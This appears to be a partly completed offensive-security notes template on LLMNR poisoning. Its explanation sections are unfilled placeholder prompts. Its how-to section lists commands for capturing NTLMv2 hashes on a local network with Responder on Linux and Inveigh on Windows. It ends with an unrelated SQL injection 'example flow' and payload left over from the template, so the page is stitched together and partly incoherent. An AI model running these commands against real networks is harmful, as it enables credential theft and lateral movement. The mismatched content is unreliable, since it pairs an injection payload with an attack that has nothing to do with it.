💥 LLMNR Poisioning
🧠What’s the Deal?​
Give us the lowdown — what is this attack and why should anyone care?
Explain the core idea behind the attack, where it fits in the kill chain, and what makes it dangerous or interesting.
🎯 What’s the Big Win?​
What’s the attacker trying to pull off here?
- Gain unauthorized access
- Extract sensitive data
- Escalate privileges
- Lateral movement across the network
Launch Sequence (How-To)​
LLMNR poisioning using Linux machine​
# Once you are in the same network as the victim machines
sudo responder -I <Interface name>
LLMNR Poisioning using Windows machine​
# Once you are in the same network as the victim machines
Import-Module .\Inveigh.ps1
#OR
.\Inveigh.exe
# Press esc and type command
GET NTLMV2UNIQUE # to get ntlm captured
Example flow:
- Identify the injection point
- Craft payload: ' OR '1'='1
- Send request and observe results